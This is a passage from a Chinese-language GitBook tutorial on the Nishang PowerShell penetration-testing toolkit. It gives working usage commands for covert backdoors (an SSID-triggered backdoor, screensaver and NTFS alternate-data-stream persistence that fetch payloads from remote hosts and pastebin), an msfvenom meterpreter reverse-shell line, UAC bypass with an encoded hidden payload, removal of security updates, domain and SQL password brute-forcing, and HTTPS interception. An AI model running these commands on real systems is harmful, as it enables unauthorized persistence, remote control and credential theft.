<li>Time &#x53C2;&#x6570;&#x53EF;&#x4EE5;&#x8BBE;&#x5B9A;&#x811A;&#x672C;&#x6267;&#x884C;&#x7684;&#x65F6;&#x95F4;&#xFF08;&#x4F8B;&#x5982;  -Time 23:21&#xFF09;</li>
<li>CheckURL &#x53C2;&#x6570;&#x4F1A;&#x68C0;&#x6D4B;&#x6211;&#x4EEC;&#x4E00;&#x4E2A;&#x6307;&#x5B9A;&#x7684;URL&#x5185;&#x5BB9;&#x662F;&#x5426;&#x5B58;&#x5728;StopString&#x7ED9;&#x51FA;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x5982;&#x679C;&#x53D1;&#x73B0;&#x4E86;&#x5C31;&#x505C;&#x6B62;&#x6267;&#x884C;<h4 id="gupt-backdoor">Gupt-Backdoor</h4>
Gupt-Backdoor&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x53EF;&#x4EE5;&#x5E2E;&#x52A9;&#x6211;&#x4EEC;&#x901A;&#x8FC7;&#x65E0;&#x7EBF;SSID&#x53CD;&#x5F39;&#x540E;&#x95E8;&#x548C;&#x6267;&#x884C;&#x547D;&#x4EE4;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</li>
</ul>
<pre><code class="lang-powershell">PS &gt;Gupt-Backdoor -MagicString test -Verbose
</code></pre>
<p>&#x8FD9;&#x91CC;&#x89E3;&#x91CA;&#x4E00;&#x4E0B;MagicString&#x8FD9;&#x4E2A;&#x53C2;&#x6570;&#xFF1A;
MagicString&#x5F00;&#x5934;&#x7684;4&#x4E2A;&#x5B57;&#x7B26;&#x662F;&#x7528;&#x6765;&#x8BC6;&#x522B;&#x6211;&#x4EEC;&#x5EFA;&#x7ACB;&#x7684;WIFI SSID&#x7684;&#x3002;&#x4F8B;&#x5982;&#xFF0C;&#x8FD9;&#x91CC;&#x662F;test&#xFF0C;Gupt&#x540E;&#x95E8;&#x4F1A;&#x53BB;&#x81EA;&#x52A8;&#x5339;&#x914D;&#x6211;&#x4EEC;WIFI&#x4E2D;SSID&#x4EE5;test&#x5F00;&#x5934;&#x7684;&#x3002;&#x800C;MagicString&#x8FD9;&#x4E2A;&#x53C2;&#x6570;&#x4ECE;&#x7B2C;&#x4E94;&#x4E2A;&#x5B57;&#x7B26;&#x5F00;&#x59CB;&#x5C31;&#x51B3;&#x5B9A;&#x4E86;&#x6211;&#x4EEC;&#x662F;&#x6267;&#x884C;&#x547D;&#x4EE4;&#x6216;&#x662F;&#x4E0B;&#x8F7D;&#x811A;&#x672C;&#x3002;
&#x9700;&#x8981;&#x6CE8;&#x610F;&#x7684;&#x662F;&#xFF1A;</p>
<ul>
<li>&#x5982;&#x679C;&#x5B83;&#x7684;&#x7B2C;&#x4E94;&#x4E2A;&#x5B57;&#x7B26;&#x662F;c&#x5C31;&#x4EE3;&#x8868;&#x6267;&#x884C;&#x547D;&#x4EE4;&#x3002;
&#x4F8B;&#x5982;&#xFF1A;-MagicString testcwhoami 
&#x5C31;&#x4F1A;&#x5339;&#x914D;WIFI SSID&#x4E3A;test&#x7684;&#xFF0C;&#x5E76;&#x6267;&#x884C;&#x547D;&#x4EE4;whoami</li>
<li>&#x5982;&#x679C;&#x5B83;&#x7684;&#x7B2C;&#x4E94;&#x4E2A;&#x5B57;&#x7B26;&#x662F;u&#x7684;&#x8BDD;&#x5C31;&#x4EE3;&#x8868;&#x4E0B;&#x8F7D;&#x811A;&#x672C;&#x3002;
&#x4F8B;&#x5982;&#xFF1A;-MagicString testuXXXX
&#x5C31;&#x4F1A;&#x5339;&#x914D;WIFI SSID&#x4E3A;test&#x7684;&#xFF0C;&#x5E76;&#x9ED8;&#x8BA4;&#x4E0B;&#x8F7D;<a href="http://goo.gl/XXXX" target="_blank">http://goo.gl/XXXX</a>
&#xFF08;&#x5176;&#x4E2D;<a href="http://goo.gl&#x53EF;&#x5728;&#x811A;&#x672C;&#x7684;$PayloadURL&#x53C2;&#x6570;&#x4E2D;&#x4FEE;&#x6539;&#xFF09;" target="_blank">http://goo.gl&#x53EF;&#x5728;&#x811A;&#x672C;&#x7684;$PayloadURL&#x53C2;&#x6570;&#x4E2D;&#x4FEE;&#x6539;&#xFF09;</a></li>
<li>&#x8FD8;&#x53EF;&#x4EE5;&#x7528;Arguments&#x53C2;&#x6570;&#x6765;&#x6307;&#x5B9A;&#x4E0B;&#x8F7D;&#x811A;&#x672C;
&#x4F8B;&#x5982;&#xFF1A;
PS &gt;Gupt-Backdoor -MagicString test -Argument Get-Information -Verbose 
&#x5C31;&#x53EF;&#x4EE5;&#x4E0B;&#x8F7D;Get-Information&#x7684;&#x811A;&#x672C;&#x4E86;</li>
</ul>
<p>&#x8865;&#x5145;
Windows&#x4E0B;&#x521B;&#x5EFA;&#x4E00;&#x4E2A;WIFI&#xFF1A;</p>
<pre><code class="lang-powershell">cmd
netsh wlan set hostednetwork mode=allow
netsh wlan set hostednetwork ssid=test key=<span class="hljs-number">1234567890</span>
netsh wlan start hostednetwork
</code></pre>
<h4 id="add-scrnsavebackdoor">Add-ScrnSaveBackdoor</h4>
<p>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x53EF;&#x4EE5;&#x5E2E;&#x52A9;&#x6211;&#x4EEC;&#x5229;&#x7528;Windows&#x7684;&#x5C4F;&#x4FDD;&#x6765;&#x7559;&#x4E0B;&#x4E00;&#x4E2A;&#x9690;&#x85CF;&#x7684;&#x540E;&#x95E8;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt;Add-ScrnSaveBackdoor -Payload <span class="hljs-string">&quot;powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process&quot;</span> //&#x4F7F;&#x7528;&#x8FD9;&#x6761;&#x8BED;&#x53E5;&#x53EF;&#x4EE5;&#x6267;&#x884C;&#x6211;&#x4EEC;&#x81EA;&#x5DF1;&#x7684;Payload
PS &gt;Add-ScrnSaveBackdoor -PayloadURL http://<span class="hljs-number">192.168</span>.<span class="hljs-number">254.1</span>/Powerpreter.psm1 -Arguments HTTP-Backdoor 
http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis //&#x5229;&#x7528;&#x8FD9;&#x6761;&#x547D;&#x4EE4;&#x53EF;&#x4EE5;&#x4ECE;powershell&#x6267;&#x884C;&#x4E00;&#x4E2A;HTTP-Backdoor
PS &gt;Add-ScrnSaveBackdoor -PayloadURL http://<span class="hljs-number">192.168</span>.<span class="hljs-number">254.1</span>/code_exec.ps1  //&#x8FD8;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;msfvenom&#x5148;&#x751F;&#x6210;&#x4E00;&#x4E2A;powershell (./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<span class="hljs-number">192.168</span>.<span class="hljs-number">254.226</span> -f powershell)&#xFF0C;&#x7136;&#x540E;&#x5229;&#x7528;&#x8FD9;&#x6761;&#x547D;&#x4EE4;&#x8FD4;&#x56DE;&#x4E00;&#x4E2A;meterpreter
</code></pre>
<p>&#x5176;&#x4ED6;&#x5177;&#x4F53;&#x7684;&#x53C2;&#x6570;&#x7684;&#x610F;&#x601D;&#x548C;&#x6211;&#x4EEC;&#x4E0A;&#x9762;&#x4ECB;&#x7ECD;&#x7684;&#x4E00;&#x4E9B;&#x540E;&#x95E8;&#x662F;&#x7C7B;&#x4F3C;&#x7684;</p>
<ul>
<li>PayloadURL &#x6307;&#x5B9A;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x4E0B;&#x8F7D;&#x7684;&#x811A;&#x672C;&#x5730;&#x5740;</li>
<li>Arguments   &#x6307;&#x5B9A;&#x6211;&#x4EEC;&#x8981;&#x6267;&#x884C;&#x7684;&#x51FD;&#x6570;&#x4EE5;&#x53CA;&#x76F8;&#x5173;&#x53C2;&#x6570;<h4 id="invoke-adsbackdoor">Invoke-ADSBackdoor</h4>
&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x662F;&#x4F7F;&#x7528;NTFS&#x6570;&#x636E;&#x6D41;&#x7559;&#x4E0B;&#x4E00;&#x4E2A;&#x6C38;&#x4E45;&#x6027;&#x540E;&#x95E8;&#x3002;&#x5176;&#x5B9E;&#xFF0C;&#x7531;NTFS&#x6570;&#x636E;&#x6D41;&#x5E26;&#x6765;&#x7684;&#x4E00;&#x4E9B;&#x5B89;&#x5168;&#x95EE;&#x9898;&#x7684;&#x5229;&#x7528;&#x5E76;&#x4E0D;&#x5C11;&#x89C1;&#x4E86;&#xFF08;&#x5982;&#xFF1A;&#x5229;&#x7528;NTFS&#x6570;&#x636E;&#x6D41;&#x5728;Mysql UDF&#x63D0;&#x6743;&#x4E2D;&#x521B;&#x5EFA;lib/plugin&#x76EE;&#x5F55;&#xFF09;&#xFF0C;&#x5927;&#x5BB6;&#x53EF;&#x4EE5;&#x53C2;&#x8003;&#x300A;<a href="http://wenku.baidu.com/view/22e049f55022aaea998f0f7c.html?from=search" target="_blank">NTFS ADS&#x5E26;&#x6765;&#x7684;WEB&#x5B89;&#x5168;&#x95EE;&#x9898;</a>&#x300B;
&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x53EF;&#x4EE5;&#x5411;ADS&#x4E2D;&#x6CE8;&#x5165;&#x4EE3;&#x7801;&#x5E76;&#x4E14;&#x4EE5;&#x666E;&#x901A;&#x7528;&#x6237;&#x6743;&#x9650;&#x8FD0;&#x884C;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</li>
</ul>
<pre><code class="lang-powershell">PS &gt;Invoke-ADSBackdoor -PayloadURL http://<span class="hljs-number">192.168</span>.<span class="hljs-number">254.1</span>/Powerpreter.psm1 -Arguments HTTP-Backdoor <span class="hljs-string">&quot;http://pastebin.
com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis
</span></code></pre>
<p>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x4E3B;&#x8981;&#x6709;&#x4E24;&#x4E2A;&#x53C2;&#x6570;&#xFF0C;&#x5728;&#x4E0A;&#x9762;&#x4ECB;&#x7ECD;&#x5176;&#x4ED6;&#x540E;&#x95E8;&#x5F53;&#x4E2D;&#x5DF2;&#x7ECF;&#x8BF4;&#x660E;&#x4E86;&#xFF0C;&#x8FD9;&#x91CC;&#x662F;&#x7C7B;&#x4F3C;&#x7684;
&#x9700;&#x8981;&#x8BF4;&#x660E;&#x7684;&#x662F;&#xFF0C;&#x6267;&#x884C;&#x540E;&#x5B83;&#x4F1A;&#x5728;AppData&#x7684;&#x76EE;&#x5F55;&#x4E0B;&#x5EFA;&#x7ACB;&#x4E00;&#x4E2A;ads&#x5E76;&#x628A;&#x6211;&#x4EEC;&#x7684;Payload&#x6CE8;&#x5165;&#x8FDB;&#x53BB;&#xFF0C;&#x5982;&#x679C;&#x6211;&#x4EEC;&#x5E0C;&#x671B;&#x5728;cmd&#x4E0B;&#x770B;&#x5230;&#x6211;&#x4EEC;&#x8FD9;&#x91CC;&#x5EFA;&#x7ACB;&#x7684;ads&#xFF0C;&#x9700;&#x8981;&#x4F7F;&#x7528;&#xFF1A;dir /a /r</p>
<h3 id="4&#x5BA2;&#x6237;&#x7AEF;">4.&#x5BA2;&#x6237;&#x7AEF;</h3>
<p>&#x5BF9;&#x4E8E;&#x8FD9;&#x4E00;&#x90E8;&#x5206;&#x7684;&#x811A;&#x672C;&#xFF0C;&#x6211;&#x5C31;&#x4E0D;&#x518D;&#x8D58;&#x8FF0;&#x4E86;&#xFF0C;&#x56E0;&#x4E3A;&#x7F51;&#x4E0A;&#x65E9;&#x5DF2;&#x7ECF;&#x6709;&#x4E86;&#x5BF9;&#x4E8E;&#x8FD9;&#x4E00;&#x90E8;&#x5206;&#x811A;&#x672C;&#x7684;&#x4ECB;&#x7ECD;&#x8BF4;&#x660E;&#xFF1A;
[&#x4F7F;&#x7528;Powershell Client&#x8FDB;&#x884C;&#x6709;&#x6548;&#x9493;&#x9C7C;][8]</p>
<h3 id="5&#x6743;&#x9650;&#x63D0;&#x5347;">5.&#x6743;&#x9650;&#x63D0;&#x5347;</h3>
<h4 id="enable-duplicatetoken">Enable-DuplicateToken</h4>
<p>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x53EF;&#x4EE5;&#x5E2E;&#x52A9;&#x6211;&#x4EEC;&#x5728;&#x5DF2;&#x7ECF;&#x83B7;&#x5F97;&#x4E86;&#x4E00;&#x5B9A;&#x6743;&#x9650;&#x7684;&#x60C5;&#x51B5;&#x4E0B;&#xFF0C;&#x4F7F;&#x6211;&#x4EEC;&#x63D0;&#x5347;&#x5230;System&#x6743;&#x9650;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;</p>
<pre><code class="lang-powershell">PS &gt; Enable-DuplicateToken
</code></pre>
<p>&#x5177;&#x4F53;&#x7684;&#x76F8;&#x5173;&#x4ECB;&#x7ECD;&#x53EF;&#x4EE5;&#x67E5;&#x9605;&#xFF1A;
<a href="https://blogs.technet.microsoft.com/heyscriptingguy/2012/07/05/use-powershell-to-duplicate-process-tokens-via-pinvoke/" target="_blank">https://blogs.technet.microsoft.com/heyscriptingguy/2012/07/05/use-powershell-to-duplicate-process-tokens-via-pinvoke/</a></p>
<h4 id="remove-update">Remove-Update</h4>
<p>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x53EF;&#x4EE5;&#x5E2E;&#x52A9;&#x6211;&#x4EEC;&#x79FB;&#x9664;&#x7CFB;&#x7EDF;&#x6240;&#x6709;&#x7684;&#x66F4;&#x65B0;&#xFF0C;&#x6216;&#x6240;&#x6709;&#x5B89;&#x5168;&#x66F4;&#x65B0;&#xFF0C;&#x4EE5;&#x53CA;&#x6307;&#x5B9A;&#x7F16;&#x53F7;&#x7684;&#x66F4;&#x65B0;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Remove-Update All       //&#x79FB;&#x9664;&#x76EE;&#x6807;&#x673A;&#x5668;&#x4E0A;&#x7684;&#x6240;&#x6709;&#x66F4;&#x65B0;
PS &gt; Remove-Update Security  //&#x79FB;&#x9664;&#x76EE;&#x6807;&#x673A;&#x5668;&#x4E0A;&#x6240;&#x6709;&#x5B89;&#x5168;&#x76F8;&#x5173;&#x66F4;&#x65B0;
PS &gt; Remove-Update KB2761226 //&#x79FB;&#x9664;&#x6307;&#x5B9A;&#x7F16;&#x53F7;&#x7684;&#x66F4;&#x65B0;
</code></pre>
<h4 id="invoke-psuacme">Invoke-PsUACme</h4>
<p>Invoke-PsUACme&#x4F7F;&#x7528;&#x4E86;&#x6765;&#x81EA;&#x4E8E;UACME&#x9879;&#x76EE;&#x7684;DLL&#x6765;Bypass UAC&#x3002;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/uac.jpg" alt="Bypass UAC">
&#x4E0A;&#x8868;&#x7ED9;&#x51FA;&#x4E86;&#x5404;&#x79CD;UAC&#x7ED5;&#x8FC7;&#x7684;&#x65B9;&#x6CD5;&#xFF0C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x5728;Invoke-PsUACme&#x4E2D;&#x6307;&#x5B9A;&#x76F8;&#x5E94;&#x65B9;&#x6CD5;&#x6267;&#x884C;&#x3002;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Invoke-PsUACme -Verbose //&#x4F7F;&#x7528;Sysprep&#x65B9;&#x6CD5;&#x548C;&#x9ED8;&#x8BA4;&#x7684;Payload&#x6267;&#x884C;
PS &gt; Invoke-PsUACme -method oobe -Verbose //&#x4F7F;&#x7528;oobe&#x65B9;&#x6CD5;&#x548C;&#x9ED8;&#x8BA4;&#x7684;Payload&#x6267;&#x884C;
PS &gt; Invoke-PsUACme -method oobe -Payload <span class="hljs-string">&quot;powershell -windowstyle hidden -e YourEncodedPayload&quot;</span> //&#x4F7F;&#x7528;-Payload&#x53C2;&#x6570;&#x53EF;&#x4EE5;&#x81EA;&#x884C;&#x6307;&#x5B9A;&#x8981;&#x6267;&#x884C;&#x7684;Payload
</code></pre>
<p>&#x9664;&#x5F00;&#x4EE5;&#x4E0A;&#x800C;&#x5916;&#xFF0C;&#x6211;&#x4EEC;&#x8FD8;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;-PayloadPath&#x53C2;&#x6570;&#x6765;&#x6307;&#x5B9A;Payload&#x7684;&#x8DEF;&#x5F84;&#xFF0C;&#x9ED8;&#x8BA4;&#x60C5;&#x51B5;&#x4E0B;Payload&#x4F1A;&#x5728;C:\Windows\Temp\cmd.bat&#x7ED3;&#x675F;&#x3002;&#x8FD8;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;-CustomDLL64&#xFF08;64&#x4F4D;&#xFF09;&#x6216;-CustomDLL32&#xFF08;32&#x4F4D;&#xFF09;&#x53C2;&#x6570;&#x6765;&#x81EA;&#x5B9A;&#x4E49;&#x4E00;&#x4E2A;DLL&#x6587;&#x4EF6;&#x3002;</p>
<h3 id="6&#x626B;&#x63CF;">6.&#x626B;&#x63CF;</h3>
<h4 id="invoke-bruteforce">Invoke-BruteForce</h4>
<p>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x53EF;&#x4EE5;&#x5BF9;SQL Server&#x3001;&#x57DF;&#x63A7;&#x5236;&#x5668;&#x3001;Web&#x4EE5;&#x53CA;FTP&#x8FDB;&#x884C;&#x53E3;&#x4EE4;&#x7684;&#x7206;&#x7834;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt; Invoke-BruteForce -ComputerName targetdomain.com -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service ActiveDirectory -StopOnSuccess -Verbose //&#x7206;&#x7834;&#x57DF;&#x63A7;&#x5236;&#x5668;
PS &gt; Invoke-BruteForce -ComputerName SQLServ01 -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose  //&#x7206;&#x7834;SQL Server
PS &gt; cat C:\test\servers.txt | Invoke-BruteForce -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose  //&#x7206;&#x7834;server.txt&#x4E2D;&#x6240;&#x6709;servers&#x7684;SQL Server
</code></pre>
<p>&#x4E3B;&#x8981;&#x7684;&#x53C2;&#x6570;&#xFF1A;</p>
<ul>
<li>ComputerName &#x7528;&#x4E8E;&#x6307;&#x5B9A;&#x5BF9;&#x5E94;&#x670D;&#x52A1;&#x7684;&#x8BA1;&#x7B97;&#x673A;&#x540D;</li>
<li>UserList &#x7528;&#x6237;&#x540D;&#x5B57;&#x5178;</li>
<li>PasswordList &#x5BC6;&#x7801;&#x5B57;&#x5178;</li>
<li>Service &#x670D;&#x52A1;&#x7C7B;&#x578B;&#xFF08;&#x6CE8;&#x610F;&#x9ED8;&#x8BA4;&#x4E3A;&#xFF1A;SQL&#xFF09;</li>
<li>StopOnSuccess &#x6210;&#x529F;&#x627E;&#x5230;&#x4E00;&#x4E2A;&#x540E;&#x5C31;&#x505C;&#x6B62;&#x6267;&#x884C;<h4 id="invoke-portscan">Invoke-PortScan</h4>
&#x5229;&#x7528;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x5728;&#x76EE;&#x6807;&#x673A;&#x5668;&#x4E0A;&#x5BF9;&#x5185;&#x7F51;&#x8FDB;&#x884C;&#x7AEF;&#x53E3;&#x626B;&#x63CF;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</li>
</ul>
<pre><code class="lang-powershell">PS &gt;Invoke-PortScan -StartAddress <span class="hljs-number">192.168</span>.<span class="hljs-number">0.1</span> -EndAddress <span class="hljs-number">192.168</span>.<span class="hljs-number">10.254</span> -ResolveHost -ScanPort -Port <span class="hljs-number">80</span>
</code></pre>
<p>&#x4E3B;&#x8981;&#x7684;&#x53C2;&#x6570;&#xFF1A;</p>
<ul>
<li>StartAddress &#x626B;&#x63CF;&#x8303;&#x56F4;&#x5F00;&#x59CB;&#x7684;&#x5730;&#x5740;</li>
<li>EndAddress   &#x626B;&#x63CF;&#x8303;&#x56F4;&#x7ED3;&#x675F;&#x7684;&#x5730;&#x5740;</li>
<li>ScanPort &#x8FDB;&#x884C;&#x7AEF;&#x53E3;&#x626B;&#x63CF;</li>
<li>Port &#x6307;&#x5B9A;&#x626B;&#x63CF;&#x7AEF;&#x53E3;&#xFF08;&#x9ED8;&#x8BA4;&#x626B;&#x63CF;&#x7AEF;&#x53E3;&#xFF1A;21,22,23,53,69,71,80,98,110,139,111,
389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,5801,5900,5555,5901&#xFF09;</li>
<li>TimeOut  &#x8BBE;&#x7F6E;&#x8D85;&#x65F6;&#x65F6;&#x95F4;</li>
</ul>
<h3 id="7&#x4E2D;&#x95F4;&#x4EBA;">7.&#x4E2D;&#x95F4;&#x4EBA;</h3>
<h4 id="invoke-interceptor">Invoke-Interceptor</h4>
<p>&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;&#x5EFA;&#x7ACB;&#x4E00;&#x4E2A;&#x4EE3;&#x7406;&#x670D;&#x52A1;&#x5668;&#x7684;&#x65B9;&#x5F0F;&#x6765;&#x62E6;&#x622A;HTTPS&#x7684;&#x8BF7;&#x6C42;&#xFF0C;&#x5E76;&#x5C06;&#x8FD9;&#x4E9B;&#x8BF7;&#x6C42;&#x8BB0;&#x5F55;&#x4E0B;&#x6765;
&#x6267;&#x884C;&#x65B9;&#x5F0F;&#xFF1A;</p>
<pre><code class="lang-powershell">PS &gt;Invoke-Interceptor -ProxyServer <span class="hljs-number">192.168</span>.<span class="hljs-number">230.21</span> -ProxyPort <span class="hljs-number">3128</span> //&#x8FD9;&#x6761;&#x547D;&#x4EE4;&#x5C06;&#x9ED8;&#x8BA4;&#x5728;<span class="hljs-number">8081</span>&#x7AEF;&#x53E3;&#x76D1;&#x542C;&#x5E76;&#x628A;&#x8BF7;&#x6C42;&#x53D1;&#x9001;&#x7ED9;&#x4E0A;&#x6E38;&#x4EE3;&#x7406;&#x7684;<span class="hljs-number">3128</span>&#x7AEF;&#x53E3;
</code></pre>
<p>&#x53EF;&#x4EE5;&#x901A;&#x8FC7;ListenPort&#x6765;&#x4FEE;&#x6539;&#x6211;&#x4EEC;&#x76EE;&#x6807;&#x673A;&#x5668;&#x4E0A;&#x7684;&#x76D1;&#x542C;&#x7AEF;&#x53E3;&#xFF08;&#x9ED8;&#x8BA4;8081&#x7AEF;&#x53E3;&#xFF09;
&#x4F8B;&#x5982;
&#x6211;&#x4EEC;&#x5728;&#x76EE;&#x6807;&#x673A;&#x5668;&#x4E0A;&#x6267;&#x884C;&#xFF1A;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/interceptor.jpg" alt="interceptor">
&#x7136;&#x540E;&#x8FD9;&#x91CC;&#x672C;&#x673A;&#x6211;&#x7528;NC&#x6765;&#x76D1;&#x542C;&#x5BF9;&#x5E94;&#x7AEF;&#x53E3;&#xFF1A;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/interceptor2.jpg" alt="interceptor">
&#x63A5;&#x6536;&#x5230;&#x4E86;&#x6765;&#x81EA;&#x76EE;&#x6807;&#x673A;&#x7684;&#x8BF7;&#x6C42;&#x6570;&#x636E;
&#x5E76;&#x4E14;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x4F1A;&#x5728;&#x76EE;&#x6807;&#x673A;&#x7684;TEMP&#x76EE;&#x5F55;&#x4E0B;&#x751F;&#x6210;interceptor.log&#x7684;&#x6587;&#x4EF6;&#x6765;&#x8BB0;&#x5F55;&#x8BF7;&#x6C42;&#x6570;&#x636E;
<img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/framework/interceptorlog.jpg" alt="interceptorlog"></p>
<h3 id="nishang&#x7ED3;&#x8BED;">Nishang&#x7ED3;&#x8BED;</h3>
<p>Nishang&#x8FD9;&#x6B3E;&#x57FA;&#x4E8E;PowerShell&#x7684;&#x6E17;&#x900F;&#x6D4B;&#x8BD5;&#x4E13;&#x7528;&#x5DE5;&#x5177;&#x96C6;&#x6210;&#x4E86;&#x975E;&#x5E38;&#x591A;&#x5B9E;&#x7528;&#x7684;&#x811A;&#x672C;&#x4E0E;&#x6846;&#x67B6;&#xFF0C;&#x65B9;&#x4FBF;&#x6211;&#x4EEC;&#x5728;&#x6E17;&#x900F;&#x6D4B;&#x8BD5;&#x8FC7;&#x7A0B;&#x4E4B;&#x4E2D;&#x4F7F;&#x7528;&#x3002;&#x5C3D;&#x7BA1;&#xFF0C;&#x5728;&#x4E00;&#x4E9B;&#x73AF;&#x5883;&#x4E0B;&#x6211;&#x4EEC;&#x53EF;&#x80FD;&#x6CA1;&#x6709;&#x529E;&#x6CD5;&#x53BB;&#x6267;&#x884C;Powershell&#xFF0C;&#x4F46;&#x662F;&#x901A;&#x8FC7;&#x67E5;&#x770B;&#x8FD9;&#x4E9B;&#x811A;&#x672C;&#x7684;&#x5177;&#x4F53;&#x4EE3;&#x7801;&#xFF0C;&#x6211;&#x4EEC;&#x4E5F;&#x53EF;&#x4EE5;&#x81EA;&#x5DF1;&#x53BB;&#x5B8C;&#x6210;&#x5B9E;&#x73B0;&#x811A;&#x672C;&#x63D0;&#x4F9B;&#x7684;&#x4E00;&#x4E9B;&#x529F;&#x80FD;&#x3002;&#x9650;&#x4E8E;&#x7BC7;&#x5E45;&#xFF0C;&#x672C;&#x6587;&#x53EA;&#x80FD;&#x629B;&#x7816;&#x5F15;&#x7389;&#x5730;&#x4ECB;&#x7ECD;Nishang&#x7684;&#x90E8;&#x5206;&#x529F;&#x80FD;&#xFF0C;&#x5E0C;&#x671B;&#x5927;&#x5BB6;&#x80FD;&#x591F;&#x5728;&#x5B9E;&#x9645;&#x7684;&#x5E94;&#x7528;&#x4E4B;&#x4E2D;&#x53BB;&#x4F53;&#x9A8C;&#x3002;</p>
<h2 id="&#x603B;&#x7ED3;">&#x603B;&#x7ED3;</h2>
<p>&#x597D;&#x4E86;&#xFF0C;&#x76EE;&#x524D;&#x5173;&#x4E8E;Powershell&#x7684;&#x4E1C;&#x897F;&#x5DF2;&#x7ECF;&#x5206;&#x4EAB;&#x5B8C;&#x5566;&#xFF0C;&#x4E2D;&#x95F4;&#x4E00;&#x4E9B;&#x5185;&#x5BB9;&#x6216;&#x8BB8;&#x6709;&#x4E9B;&#x9519;&#x8BEF;&#xFF0C;&#x4E4B;&#x540E;&#x5982;&#x679C;&#x8FD8;&#x6709;&#x66F4;&#x65B0;&#x8BF7;&#x5173;&#x6CE8;&#x6211;&#x7684;<a href="https://rootclay.gitbooks.io/powershell-attack-guide/content/" target="_blank">GitBook</a>&#xFF0C;&#x6700;&#x540E;&#x5148;&#x5356;&#x4E00;&#x6CE2;&#x7EA2;&#x7EBF;&#xFF5E;&#xFF0C;&#x5927;&#x5BB6;&#x4E0D;&#x77E5;&#x9053;&#x7EA2;&#x7EBF;&#x662F;&#x4EC0;&#x4E48;&#x7684;&#x8BDD;&#x53EF;&#x4EE5;&#x626B;&#x4E00;&#x626B;:)</p>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/op/7.jpg" alt=""></p>

                                
                                </section>
                            
    </div>
    <div class="search-results">
        <div class="has-results">
            
            <h1 class="search-results-title"><span class='search-results-count'></span> results matching "<span class='search-query'></span>"</h1>
            <ul class="search-results-list"></ul>
            
        </div>
        <div class="no-results">
            
            <h1 class="search-results-title">No results matching "<span class='search-query'></span>"</h1>
            
        </div>
    </div>
</div>

                        </div>
                    </div>
                
            </div>

            
                
                <a href="12. 实例使用场景.html" class="navigation navigation-prev navigation-unique" aria-label="Previous page: 实例使用场景">
                    <i class="fa fa-angle-left"></i>
                </a>
                
                
            
        
    </div>

    <script>
        var gitbook = gitbook || [];
        gitbook.push(function() {
            gitbook.page.hasChanged({"page":{"title":"Framework","level":"1.4.2","depth":2,"previous":{"title":"实例使用场景","level":"1.4.1","depth":2,"path":"12. 实例使用场景.md","ref":"12. 实例使用场景.md","articles":[]},"dir":"ltr"},"config":{"gitbook":"*","theme":"default","variables":{},"plugins":["livereload"],"pluginsConfig":{"livereload":{},"highlight":{},"search":{},"lunr":{"maxIndexSize":1000000,"ignoreSpecialCharacters":false},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2},"theme-default":{"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"},"showLevel":false}},"structure":{"langs":"LANGS.md","readme":"README.md","glossary":"GLOSSARY.md","summary":"SUMMARY.md"},"pdf":{"pageNumbers":true,"fontSize":12,"fontFamily":"Arial","paperSize":"a4","chapterMark":"pagebreak","pageBreaksBefore":"/","margin":{"right":62,"left":62,"top":56,"bottom":56}},"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"}},"file":{"path":"13. Framework.md","mtime":"2020-04-13T09:55:17.642Z","type":"markdown"},"gitbook":{"version":"3.2.3","time":"2020-04-13T09:56:21.455Z"},"basePath":".","book":{"language":""}});
        });
    </script>
</div>

        
    <script src="gitbook/gitbook.js"></script>
    <script src="gitbook/theme.js"></script>
    
        
